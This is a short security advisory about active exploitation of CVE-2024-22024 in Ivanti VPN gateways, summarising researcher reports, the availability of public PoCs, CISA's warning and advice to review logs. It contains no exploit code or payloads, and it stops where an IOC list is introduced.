Exploitation of Another Ivanti VPN Vulnerability Observed

Last week, Ivanti disclosed a new vulnerability impacting its Connect Secure, Policy Secure, and ZTA gateway appliances. Tracked as CVE-2024-22024, the flaw impacts the SAML component of these appliances and can be exploited by actors to gain access to restricted resources without authentication. At the time of the disclosure, Ivanti noted that it had no evidence to suggest that the flaw was being actively exploited. However, security researchers like Kevin Beaumont have posted on X that this statement is false and that the flaw is indeed being actively exploited. In particular, security researcher David Vorel replied to Beaumont’s post noting that he observed devices being compromised shortly after the latest patches were installed on them and even after a factory reset was performed.

Security Officer Comments:
While no actual details of the exploitation attempts were mentioned, it is safe to say that actors will likely abuse the bug to target unpatched appliances as observed with the previous three flaws that were addressed this year. Since the disclosure from Ivanti several PoC exploits for CVE-2024-22024 have been released, making it easier for actors to launch their attacks. According to attack surface management firm WatchTowr, the exploitation of CVE-2024-22024 is possible with a basic, publicly available payload for out-of-bounds XXE, increasing the overall severity and impact of the bug.

Suggested Corrections:
The development comes after CISA warned organizations to take Ivanti appliances off their networks due to heightened exploitation attempts. Regardless of patches being applied there is the possibility of actors compromising these appliances well before patches were employed and deploying web shells for persistent access. In light of this, security researchers are advising organizations to check their logs to identify potential exploitation attempts. A couple of IOCs to look for are included below: